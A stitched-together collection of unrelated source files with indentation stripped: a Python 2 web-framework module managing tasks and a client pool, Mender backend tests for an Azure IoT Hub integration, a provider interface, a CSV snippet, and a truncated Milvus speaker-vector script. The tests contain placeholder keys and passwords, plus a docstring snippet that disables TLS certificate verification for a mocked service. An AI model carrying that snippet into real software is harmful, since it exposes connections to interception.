data = {"num" : profile.get("num"), "path":path}
data.update(profile.get("time"))
overview.append(data)
#recent requests
lst = webapp.profile.get("recent")
recent = rv["recent"]
for entry in lst:
times = entry.get("time")
times['path'] = entry.get("path")
recent.append(times)
else:
rv["alert"] = "Request profiling is not turned on"
return rv
#############################################################################
@webapp.expose
def status(self, **kwargs):
req = kwargs.get("__request");
if self.statusKey not in kwargs:
raise webapp.HTTPError(404)
status = "OK"
show_profile = kwargs.has_key("profile")
show_debugging = kwargs.has_key("debug")
show_tasks = kwargs.has_key("tasks")
# General information about user requests
n = 0
r = "%s\n<pre>%d user requests/sec\n%s user requests (total)\n\n" % (
status,
self.http_requests_prev,
self.http_requests_total
)
# Debugging information
if show_debugging:
r += "\n\nClient Pool Size: BUSY: %d, IDLE: %d" % (len(self.client_pool.busy), len(self.client_pool.pool))
if self.debugging:
r += "\nBusy clients requested by:"
for client in self.client_pool.busy:
r += "\n%s: %s" % (client.id, client.requested_by)
# WSGI Request profiling
if self.profiling_wsgi and show_profile:
r += "\n\nWeb Sessions: %d" % len(webapp.sessionCache.keys())
r += "\n\nTotal Time spent on http requests\n"
r += "<table style=\"width:100%; text-align:left;\">"
lst = webapp.profile.get("overview").items()
lst = sorted(lst, key=lambda p: p[1].get("num"), reverse=True)
headers = False
for path, profile in lst:
if not headers:
headers = profile.get("time").keys()
r += "<tr><th>Path</th><th>Num</th></td>"
for handler in headers:
r+= "<th>%s</th>" % handler
r += "</tr>"
r += "<tr><td>%s</td><td>%d</td>" % (path, profile.get("num"))
for handler in headers:
r += "<td>%f</td>" % (profile.get("time").get(handler, 0.0))
r += "</tr>"
r += "</table>"
r += "\n\nMost recent requests\n"
r += "<table style=\"width:100%; text-align:left;\">"
lst = webapp.profile.get("recent")
headers = False
for entry in lst:
path = entry.get("path"),
times = entry.get("time")
if not headers:
headers = times.keys()
r += "<tr><th>Path</th></td>"
for handler in headers:
r+= "<th>%s</th>" % handler
r += "</tr>"
r += "<tr><td>%s</td>" % (path)
for handler in headers:
r += "<td>%f</td>" % (times.get(handler, 0.0))
r += "</tr>"
r += "</table>"
r += str(webapp.profile.get("longest"))
# Task list
if show_tasks:
r += "\n\nTasks"
for id, task in self.tasks.items():
r += "\nID: %s OWN: %s PS: %s INFO: %s R: %s CMD: %s %s %s" % (
id,
task.get("owner"),
task.get("process").poll(),
task.get("info"),
str(type(task.get("result"))).replace("<","").replace(">",""),
task.get("module"),
task.get("task"),
task.get("params")
)
r += "</pre>"
return r
#############################################################################
def update_sesmap(self, data):
if not hasattr(self, "lockSesmap"):
self.lockSesmap = threading.Lock()
self.lockSesmap.acquire()
try:
self.log.debug("Updating session map (cache)")
self.session_map.update(data)
for sid, status in data.items():
if not status:
del self.session_map[sid]
if self.xbahn:
self.log.debug("Updating session map (xbahn)")
self.xbahn.send(None, "__vodka.update.session_map", data)
self.log.debug("Update session map (xbahn) COMPLETED")
finally:
self.lockSesmap.release()
#############################################################################
def logout_all_sessions(self):
pass
#############################################################################
def task_update_receiver(self, xb, msg, data):
if type(data) == dict:
self.task_info_receiver(xb, msg, data)
else:
self.task_result_receiver(xb, msg, data)
#############################################################################
def task_info_receiver(self, xb, msg, data):
id = msg.subject.split(".")[-1]
#self.log.debug("Received task info %s: %s" % (id, data))
if self.tasks.has_key(id):
info = self.tasks[id].get("info",{})
if info.get("owner") and info.get("owner") not in webapp.sessionCache.keys():
webapp.log.info("Ignoring task info since the owning user session is no longer a round")
return self.task_cleanup(id)
else:
self.tasks[id]["info"].update(data)
self.tasks[id]["info"].update(update_t=time.time())
if self.tasks[id]["info"].get("status") == vodkatask.FINISHED:
if self.tasks[id].get("callback"):
d = VodkaAppThread(self.tasks[id]["callback"])
d.start(self.task_result(id), self, id)
#############################################################################
def task_result_receiver(self, xb, msg, data):
id = msg.subject.split(".")[-1]
if self.tasks.has_key(id):
task = self.tasks.get(id)
task["info"].update(update_t=time.time())
#self.log.debug("got task result data: %s" % msg.subject)
if not task.get("result"):
task["result"] = data
else:
existing = task.get("result")
if type(data) == list and type(existing) == list:
existing.extend(data)
else:
existing.update(data)
#############################################################################
def task_info(self, id):
return self.tasks.get(id, {}).get("info")
#############################################################################
def task_result(self, id):
data = self.tasks.get(id, {}).get("result")
if data:
del self.tasks[id]["result"]
return data
#############################################################################
def task_cleanup_worker(self):
while webapp.serverStatus != webapp.SERVER_SHUTTING_DOWN:
t = time.time()
cleanup = []
for id, task in self.tasks.items():
info = task.get("info",{})
if info.get("status") == vodkatask.FINISHED:
if not task.get("result") and t-info.get("end_t",0) > 60:
self.log.debug("Removing task %s because it is finished and its result has been retrieved" % id)
cleanup.append(id)
elif t-info.get("end_t", t) > self.taskCleanupMargin:
self.log.debug("Removing task %s because it is finished and result has not been requested in time (%d seconds)" % (id, self.taskCleanupMargin))
cleanup.append(id)
elif t-info.get("start_t", 0) > self.taskTimeoutMargin:
self.log.debug("Removing task %s because it did not finish before timeout margin was up (%d seconds)" % (id, self.taskTimeoutMargin))
self.task_terminate(id)
info.update(zombie=True, end_t=t, status=vodkatask.FINISHED, error="Terminated: task timed out")
elif t-info.get("update_t", 0) > self.taskSilenceMargin:
self.log.debug("Removing task %s because it was silent for too long (> %d seconds)" % (id, self.taskSilenceMargin))
self.task_terminate(id)
info.update(zombie=True, end_t=t, status=vodkatask.FINISHED, error="Terminated: task unresponsive")
for id in cleanup:
self.task_cleanup(id)
time.sleep(1)
#############################################################################
def task_cleanup(self, id):
task = self.tasks.get(id)
if not task:
return
info = task.get("info")
if info:
if task.get("owner"):
ses = webapp.sessionCache.get(task.get("owner")).data.get("client_session")
ses.tasks.remove(id)
try:
del self.tasks[id]
except:
pass
#############################################################################
def tasks_terminate(self):
tasks = self.tasks.items()
self.info("Terminating tasks %s" % tasks)
for id, task in tasks:
self.task_terminate(id)
#############################################################################
def task_terminate(self, id):
if self.tasks.has_key(id):
task = self.tasks[id]
self.info("Terminating task %s" % id)
try:
proc = task.get("process")
if proc and proc.pid:
os.kill(int(proc.pid), signal.SIGTERM)
if not proc.poll():
os.kill(int(proc.pid), signal.SIGKILL)
except Exception, inst:
self.log.error(traceback.format_exc())
#############################################################################
def task_run(self, moduleName, taskName, id="task", params={}, target="download", filename=None, ses=None, limitResult=0, source="unknown", callback=None):
id = "%s-%s" % (id, str(webapp.uuid.uuid4()))
params = jsonlib.dumps(params)
cmd = [
"python",
os.path.join(vodkaPath, "task.py"),
moduleName,
taskName,
self.id,
id,
"--config",
serverConfPath,
"--param",
params
]
if limitResult:
cmd.extend(["--limit", str(limitResult)])
p = subprocess.Popen(cmd, close_fds=True)
if ses:
owner = ses.client_id
else:
owner = None
print "%s runtask:%s" % (p.pid, cmd)
self.tasks[id] = {
"owner" : owner,
"process" : p,
"callback" : callback,
"module" : moduleName,
"task" : taskName,
"params" : params,
"info" : {
"id" : id,
"source" : source,
"start_t" : time.time(),
"update_t" : time.time(),
"filename" : filename,
"target" : target
}
}
print "%s" % self.tasks.keys()
return (id, p)
###############################################################################
# ClientPool
###############################################################################
class ClientPool:
"""
ClientPool holds a pool of VodkaClients which each can hold connections to databases
and so forth.
Makes client usage thread-safe
"""
idx = 0
def __init__(self, size, app, idstr="pooled_%d"):
"""
Initialize ClientPool
size should be the amount of initial connections in the pool, needs
to be >= 1
app needs to be a reference to the VodkaApp Instance
idstr will be the prefix for the client id
"""
if size < 1:
raise Exception("Client Pool size needs to be at least 1")
i = 0
self.busy = []
self.pool = []
self.app = app
self.base_size = size
while i <= size:
self.pool.append(self.app._Client(
idstr % i,
pool = self,
app = self.app
))
i += 1
self.idx = i
#############################################################################
def get_client(self, for_duration=10):
"""
Return the first client in the pool that is currently not in use.
Also respawn any clients that have timed out
for_duration <int> 10 - claim the client for n seconds, if it is not returned
within the alloted time it will be timed out and respawned
"""
t = time.time()
r = None
self.respawn_timed_out(t)
if self.pool:
i = 0
for r in self.pool:
if r.status == 2 and r.client:
self.pool.pop(i)
break
r.connect()
#r = self.pool.pop()
r = None
i += 1
# no connected client could be obtained, create a new
# client object and connect it
if not r:
r = self.app._Client(
"pooled_%d" % self.idx,
pool = self,
app = self.app,
)
self.idx += 1
# if debugging is on find out what requested the client and log it
if self.app.debugging:
r.requested_by = []
for row in inspect.stack():
r.requested_by.append((row[3], row[2]))
self.app.log.debug("Client '%s' requested by %s" % (r.id, r.requested_by))
self.busy.append(r)
r.last_request = []
r.for_duration = t
r.time = t
return r
############################################################################
# cycle through busy clients and find those that are older than
# 1 minute, meaning they have timed out, never been used
def respawn_timed_out(self, t):
for client in self.busy:
if t - client.time > client.for_duration:
if webapp.log:
if not client.last_request or client.last_request[0] != "login":
webapp.log.debug("%s: %s has TIMED OUT, attempting to remove/respawn" % (
client.id,
client.last_request
))
elif client.last_request and client.last_request[0] == "login":
webapp.log.debug("%s: %s has TIMED OUT, attempting to remove/respawn" % (
client.id,
client.last_request[0]
))
try:
client.disconnect()
self.busy.remove(client)
if client.client and client.client.transport.isOpen():
client.client.transport.close()
client.connect()
if self.app.debugging:
client.requested_by = None
self.pool.append(client)
if webapp.log:
webapp.log.debug("%s respawned after timeout" % client.id)
except Exception, inst:
webapp.log.error("Client Pool Cleanup Error: "+traceback.format_exc())
#############################################################################
# respawn client
def respawn(self, client):
"""
Respawn client, remove client from busy list
"""
try:
self.busy.remove(client)
except:
pass
if not client in self.pool:
busy = len(self.busy)
pool = len(self.pool)
if not busy and pool > self.base_size:
client.disconnect()
webapp.log.debug("retired: %s (%d free, %d busy)" % (client.id, pool, busy))
else:
if self.app.debugging:
client.requested_by = None
self.pool.append(client)
if webapp.log:
webapp.log.debug("respawned: %s (%d free, %d busy)" % (client.id, pool, busy))
#############################################################################
# reconnect all clients
def reconnect(self):
"""
Reconnect all clients in the pool,
and remove all clients from the busy list
"""
self.pool.extend(self.busy)
self.busy = []
for client in self.pool:
client.connect()
#############################################################################
# disconnect all
def disconnect(self):
"""
Disconnect all clients in the pool and clear busy list
"""
self.pool.extend(self.busy)
self.busy = []
for client in self.pool:
client.disconnect()
self.pool = []
###############################################################################
# VodkaClient
###############################################################################
class VodkaClient(object):
"""
Vodka client base class
"""
def __init__(self, id="VodkaClient", pool=None, app=None, timeout=None):
self.config = webapp.configs.get(serverConfPath,{})
self.id = id
self.busy = False
self.timeout = timeout
self.time = 0
self.for_duration = 10
self.status = 0
self.isMain = False
self.children = None
self.db_prefs = None
self.db_modules = None
self.pool = pool
self.app = app
self.ses_id = ""
self.lockBusy = threading.RLock()
self.last_request = []
if module_py_components:
for name in module_py_load_order:
mod = module_py_components.get(name)
if hasattr(mod, 'extend_client'):
mod.extend_client(self, VodkaClient);
if app:
self.db_prefs = app.db_prefs
def connect(self, *args, **kwargs):
pass
def disconnect(self, *args, **kwargs):
pass
###############################################################################
# Spawn and mount vodka application on root path
def vodka_shutdown():
app = webapp.app_map["vodka"]
app.stop()
webapp.serverStatus = webapp.SERVER_SHUTTING_DOWN
def init():
App = webapp.register_app(VodkaApp(), "vodka", "")
webapp.start_plugins(App.config)
webapp.shutdown_handlers.append(vodka_shutdown)
if serverConf.get("wsgiserver") == "gevent":
gevent_start_server()
if serverConf.get("wsgiserver") == "eventlet":
eventlet_start_server()
|
# Copyright 2022 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict
from typing import Optional
import pytest
import logging
import os
import re
import ssl
import uuid
from base64 import b64decode
import trustme
from azure.iot.hub import IoTHubRegistryManager
from pytest_httpserver import HTTPServer
from redo import retrier, retriable
from requests.models import Response
from testutils.api import (
deviceauth,
deviceconfig,
iot_manager as iot,
useradm,
)
from testutils.api.client import ApiClient, get_free_tcp_port
from testutils.common import (
Device,
User,
create_org,
create_user,
create_user_test_setup,
create_tenant_test_setup,
clean_mongo,
make_accepted_device,
mongo,
)
HTTPServer.DEFAULT_LISTEN_PORT = get_free_tcp_port()
HTTPServer.DEFAULT_LISTEN_HOST = (
"mender-backend-tests-runner" # name of the compose service
)
@pytest.fixture(scope="session")
def ca():
return trustme.CA()
@pytest.fixture(scope="session")
def localhost_cert(ca):
return ca.issue_cert(HTTPServer.DEFAULT_LISTEN_HOST)
@pytest.fixture(scope="session")
def httpserver_ssl_context(localhost_cert) -> ssl.SSLContext:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
crt = localhost_cert.cert_chain_pems[0]
key = localhost_cert.private_key_pem
with crt.tempfile() as crt_file, key.tempfile() as key_file:
context.load_cert_chain(crt_file, key_file)
return context
class _TestAzureBase:
azure_api = ApiClient(base_url=iot.URL_MGMT, host=iot.HOST, schema="http://")
@property
def logger(self):
return logging.getLogger(self.__class__.__name__)
def save_integration(self, user: User, integration: Dict) -> Response:
response = (
self.azure_api.with_auth(user.utoken)
.with_header("Content-Type", "application/json")
.call("POST", iot.URL_INTEGRATIONS, integration)
)
return response
def get_integrations(self, user: User) -> Response:
response = (
self.azure_api.with_auth(user.utoken)
.with_header("Content-Type", "application/json")
.call("GET", iot.URL_INTEGRATIONS)
)
return response
def check_integrations(self, user: User, expected_integration: Dict):
"""Make sure iot-manager properly saves connection strings in its database."""
response = self.save_integration(user, expected_integration)
assert response.status_code == 201
self.logger.info("saved integrations")
self.logger.info("getting integrations")
response = self.get_integrations(user)
assert response.status_code == 200
self.logger.info(f"got integrations: {response.text}")
integrations = response.json()
assert len(integrations) > 0
assert "credentials" in integrations[0].keys()
assert "connection_string" in integrations[0]["credentials"].keys()
actual = integrations[0]["credentials"]["connection_string"]
# Check for equality by parts:
# Check that actual properties are a subset of expected integrations
for part in actual.split(";"):
# SharedAccessKey will be masked, with only the first 4 characters visible
# and the rest of the string replaced with a place holder. For this reason,
# we'll test the first 20 bytes only
if part.startswith("SharedAccessKey="):
part = part[:20]
assert part in expected_integration["credentials"]["connection_string"]
# Check that expected properties are a subset of actual integrations
for part in expected_integration["credentials"]["connection_string"].split(";"):
# SharedAccessKey will be masked, with only the first 4 characters visible
# and the rest of the string replaced with a place holder. For this reason,
# we'll test the first 20 bytes only
if part.startswith("SharedAccessKey="):
part = part[:20]
assert part in actual
class TestAzureIntegrations(_TestAzureBase):
@pytest.mark.parametrize(
"expected_integration",
[
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=OldKey",
"type": "sas",
},
},
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=NewKey",
"type": "sas",
},
},
],
)
def test_get_and_set(self, clean_mongo, expected_integration):
"""
Check that we can set and get integrations
"""
self.logger.info("creating user in OS mode")
user = create_user_test_setup()
self.check_integrations(user, expected_integration)
class TestAzureIntegrationsEnterprise(_TestAzureBase):
@pytest.mark.parametrize(
"expected_integration",
[
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=OldKey",
"type": "sas",
},
},
{
"provider": "iot-hub",
"credentials": {
"connection_string": "HostName=localhost;SharedAccessKey=thisIsBase64;SharedAccessKeyName=NewKey",
"type": "sas",
},
},
],
)
def test_get_and_set(self, clean_mongo, expected_integration):
"""
Check that we can set and get integrations
"""
self.logger.info("creating tenant and user in enterprise mode")
tenant = create_tenant_test_setup()
user = tenant.users[0]
self.check_integrations(user, expected_integration)
def get_connection_string():
"""Determine whether AZURE_IOTHUB_CONNECTIONSTRING or AZURE_IOTHUB_CONNECTIONSTRING_B64
environment variable is set.
"""
azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
if azure_iot_hub_mock:
mock_sas_key = "QXp1cmUgSW90IEh1YiBjb25uZWN0aW9uIHN0cmluZw=="
mock_sas_policy = "mender-test-policy"
return f"HostName={HTTPServer.DEFAULT_LISTEN_HOST}:{HTTPServer.DEFAULT_LISTEN_PORT};SharedAccessKeyName={mock_sas_policy};SharedAccessKey={mock_sas_key}"
connection_string = os.environ.get("AZURE_IOTHUB_CONNECTIONSTRING")
if connection_string is None:
cs_b64 = os.environ.get("AZURE_IOTHUB_CONNECTIONSTRING_B64")
if cs_b64 is None:
pytest.skip(
"Test requires setting AZURE_IOTHUB_CONNECTIONSTRING "
+ "or AZURE_IOTHUB_CONNECTIONSTRING_B64"
)
connection_string = b64decode(cs_b64).decode("utf-8")
return connection_string
@pytest.fixture(scope="function")
def azure_user(clean_mongo) -> Optional[User]:
"""Create Mender user and create an Azure IoT Hub integration in iot-manager using the connection string."""
api_azure = ApiClient(base_url=iot.URL_MGMT)
uuidv4 = str(uuid.uuid4())
try:
tenant = create_org(
"test.mender.io-" + uuidv4, f"user+{uuidv4}@example.com", "password123",
)
user = tenant.users[0]
user.tenant = tenant
except RuntimeError: # If open-source
user = create_user(f"user+{uuidv4}@example.com", "password123")
# Authorize
rsp = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert rsp.status_code == 200
user.token = rsp.text
connection_string = get_connection_string()
integration = {
"provider": "iot-hub",
"credentials": {"connection_string": connection_string, "type": "sas"},
}
# create the integration in iot-manager
rsp = api_azure.with_auth(user.token).call(
"POST", iot.URL_INTEGRATIONS, body=integration
)
assert rsp.status_code == 201
yield user
def get_azure_client():
connection_string = get_connection_string()
azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
if azure_iot_hub_mock:
client = IoTHubRegistryManager(
connection_string=connection_string,
host="mock_host",
token_credential="test_token",
)
client.protocol.config.connection.verify = False
return client
return IoTHubRegistryManager.from_connection_string(connection_string)
class _TestAzureDeviceLifecycleBase:
"""Test device lifecycle in real or mocked Azure IoT Hub. Real Azure is used by default in CI.
Note: Following code needs to be placed in azure-iot-manager's router.go to enable insecure HTTPS requests when mocked Azure is used
conf := NewConfig(config...)
customTransport := &(*http.DefaultTransport.(*http.Transport))
customTransport.TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
if conf.Client == nil {
conf.Client = &http.Client{Transport: customTransport}
}
"""
@classmethod
def setup_class(cls):
cls.azure_iot_hub_mock = os.environ.get("AZURE_IOTHUB_MOCK")
cls.azure_client = get_azure_client()
cls.api_devauth_devices = ApiClient(base_url=deviceauth.URL_DEVICES)
cls.api_devauth_mgmt = ApiClient(base_url=deviceauth.URL_MGMT)
cls.api_azure = ApiClient(base_url=iot.URL_MGMT)
cls.api_deviceconfig = ApiClient(base_url=deviceconfig.URL_MGMT)
cls.devices = list()
cls.logger = logging.getLogger(cls.__class__.__name__)
@classmethod
def teardown_class(cls):
"""Remove all devices created during test from Azure IoT Hub."""
if not cls.azure_iot_hub_mock:
cls.logger.info(
f"Azure IoT Hub test teardown - removing devices: {cls.devices}"
)
for device_id in cls.devices:
cls.azure_client.delete_device(device_id)
@staticmethod
def _prepare_iot_hub_upsert_device_response(status: str = "enabled") -> Dict:
"""Adjustable Azure IoT Hub GET /devices/<ID> response model."""
return {
"status": status,
"authentication": {
"provider": "sas",
"symmetricKey": {
"primaryKey": "Tm9ydGhlcm4udGVjaCBpcyB0aGUgYmVzdCBjb21wYW55IGluIHRoZSB3b3JsZA==",
"secondaryKey": "Tm9ydGhlcm4udGVjaCAtIHNlY3VyaW5nIHdvcmxkJ3MgY29ubmVjdGVkIGRldmljZXM=",
},
"x509Thumbprint": {"primaryThumbprint": "", "secondaryThumbprint": ""},
},
"properties": {
"desired": {"key": "value"},
"reported": {"another-key": "another-value"},
},
"tags": {"tag-key": "tag-value"},
"capabilities": {"iotEdge": False},
"connectionState": "Disconnected",
}
def _prepare_device(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
) -> Device:
"""Create accepted device in Mender and make sure it has been successfully added in Azure IoT Hub."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="PATCH",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
tenant_token = getattr(getattr(azure_user, "tenant", {}), "tenant_token", "")
dev = make_accepted_device(
self.api_devauth_devices,
self.api_devauth_mgmt,
azure_user.token,
tenant_token=tenant_token,
test_type="azure",
)
self.devices.append(dev.id)
for _ in retrier(attempts=5, sleeptime=1):
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE(dev.id)
)
if rsp.status_code == 200:
break
return dev
@retriable(sleeptime=1, attempts=5)
def _check_deviceconfig(self, azure_user: User, device_id: str):
"""Check if Azure IoT Hub primary and secondary keys have been added to deviceconfig database."""
rsp = self.api_deviceconfig.with_auth(azure_user.token).call(
"GET", deviceconfig.URL_MGMT_DEVICE_CONFIGURATION.format(id=device_id)
)
assert rsp.status_code == 200
conf = rsp.json().get("configured")
assert len(conf) > 0
assert "azureConnectionString" in conf
@retriable(sleeptime=2, attempts=5)
def _check_if_device_status_is_set_to_value(
self, azure_user: User, httpserver: HTTPServer, device_id: str, status: str
):
"""Check if device status in IoT Hub is set to the desired value."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(
self._prepare_iot_hub_upsert_device_response(status=status)
)
# device exists in iot-manager
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(device_id)
)
assert rsp.status_code == 200
# check the status of the device in IoT Hub
device = get_azure_client().get_device(device_id)
assert device.status == status
@pytest.mark.parametrize("status", ["rejected", "noauth"])
def test_device_accept_and_reject_or_dismiss(
self,
status,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test how accepted-rejected and accepted-dismissed Mender flow affects Azure IoT Hub devices."""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
@retriable(sleeptime=1, attempts=5)
def set_device_status_in_mender(desired_status: str):
"""Set device status in Mender."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_json(
self._prepare_iot_hub_upsert_device_response(status="disabled")
)
authset_id = dev.authsets[0].id
if status == "noauth":
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"DELETE",
deviceauth.URL_AUTHSET,
path_params={"did": dev.id, "aid": authset_id},
)
else:
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"PUT",
deviceauth.URL_AUTHSET_STATUS,
deviceauth.req_status(desired_status),
path_params={"did": dev.id, "aid": authset_id},
)
assert rsp.status_code == 204
self._check_deviceconfig(azure_user, dev.id)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
#
set_device_status_in_mender(status)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "disabled"
)
def test_device_provision_and_decomission(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test how accepted-decommissioned Mender flow affects Azure IoT Hub devices."""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
@retriable(sleeptime=2, attempts=5)
def decommission_device():
"""Decommission the device in Mender, which in turn removes the device from IoT Hub."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="DELETE",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=404)
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"DELETE", deviceauth.URL_DEVICE.format(id=dev.id),
)
assert rsp.status_code == 204
@retriable(sleeptime=2, attempts=5)
def check_if_device_was_removed_from_azure():
"""Check if device was remove from Azure IoT HUb using azure-iot-manager service proxy."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=404)
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id)
)
assert rsp.status_code == 404
self.devices.remove(dev.id)
self._check_deviceconfig(azure_user, dev.id)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
#
decommission_device()
check_if_device_was_removed_from_azure()
def test_device_twin(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test device state synchronization with IoT Hub Device Twin"""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
# get the all device states (device twins)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id)
)
assert rsp.status_code == 200
states = rsp.json()
assert len(states.keys()) == 1
integration_id = list(states.keys())[0]
assert "desired" in states[integration_id]
assert "reported" in states[integration_id]
# set the device state (device twin)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
twin = {
"desired": {"key": "value"},
}
rsp = (
self.api_azure.with_auth(azure_user.token)
.with_header("Content-Type", "application/json")
.call("PUT", iot.URL_DEVICE_STATE(dev.id) + "/" + integration_id, twin)
)
assert rsp.status_code == 200
state = rsp.json()
assert "desired" in state
assert "reported" in states[integration_id]
assert state["desired"]["key"] == "value"
# get the device state (device twin)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id) + "/" + integration_id
)
assert rsp.status_code == 200
state = rsp.json()
assert "desired" in state
assert "reported" in states[integration_id]
assert state["desired"]["key"] == "value"
class TestAzureDeviceLifecycle(_TestAzureDeviceLifecycleBase):
pass
class TestAzureDeviceLifecycleEnterprise(_TestAzureDeviceLifecycleBase):
pass
|
import abc
class ProviderInterfaceV0(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def sensor_products(product_id):
"""Returns list of all available products for a given scene id"""
return
@abc.abstractmethod
def available_products(self, product_id, username):
"""Returns list of products available for a give user"""
return
@abc.abstractmethod
def fetch_user_orders(self, uid):
"""Returns list of orders for a given user"""
return
@abc.abstractmethod
def check_open_scenes(self, uid):
"""Returns list of open scenes for a given user"""
return
@abc.abstractmethod
def fetch_order(self, ordernum):
"""Returns details for a given order"""
return
@abc.abstractmethod
def place_order(self, username, order):
"""Method for placing a processing order"""
return
@abc.abstractmethod
def cancel_order(self, orderid, request_ip_address):
"""Kill an order in progress"""
return
@abc.abstractmethod
def item_status(self, orderid, itemid):
"""Return order item processing status"""
return
class MockOrderingProvider(object):
__metaclass__ = abc.ABCMeta
def place_order(self, username):
pass
def list_orders(self, username_or_email):
pass
def view_order(self, orderid):
pass
def item_status(self, orderid, itemid='ALL'):
"""
:rtype: str
"""
pass
|
from csv import DictReader
#reading file with specific delimiter
with open('fighters_with_pipe.csv') as file:
csv_dict_reader = DictReader(file,delimiter='|')
for row in csv_dict_reader:
print(row) |
import numpy as np
import random
import os
import sys
from audio import read_mfcc
from batcher import sample_from_mfcc
from constants import SAMPLE_RATE, NUM_FRAMES
from conv_models import DeepSpeakerModel
from test import batch_cosine_similarity
import time
from milvus import Milvus, IndexType, MetricType, Status
from milvus.client.abstract import TopKQueryResult
np.random.seed(123)
random.seed(123)
file_path = 'samples/PhilippeRemy'
model = DeepSpeakerModel()
model.m.load_weights('checkpoints/ResCNN_triplet_training_checkpoint_265.h5', by_name=True)
_HOST = '192.168.1.85'
_PORT = '19530' # default value
_DIM = 512 # dimension of vector
_INDEX_FILE_SIZE = 32 # max file size of stored index
collection_name = 'example_speaker'
milvus = Milvus()
def voc_to_vec(file):
mfcc = sample_from_mfcc(read_mfcc(file, SAMPLE_RATE), NUM_FRAMES)
predict = model.m.predict(np.expand_dims(mfcc, axis=0))
vec = list(map(float,predict.tolist()[0]))
return vec
def load_voc(file_path):
filenames = os.listdir(file_path)
filenames.sort()
vectors = []
ids = []
for filename in filenames:
vectors.append(voc_to_vec(file_path + '/' + filename))
ids.append(int(filename[0:4]))
return vectors,ids
def connect_milvus_server():
# print("connect to milvus")
status = milvus.connect(host=_HOST, port=_PORT, timeout=1000 * 1000 * 20)
print(status)
return status
def create_milvus_collection():
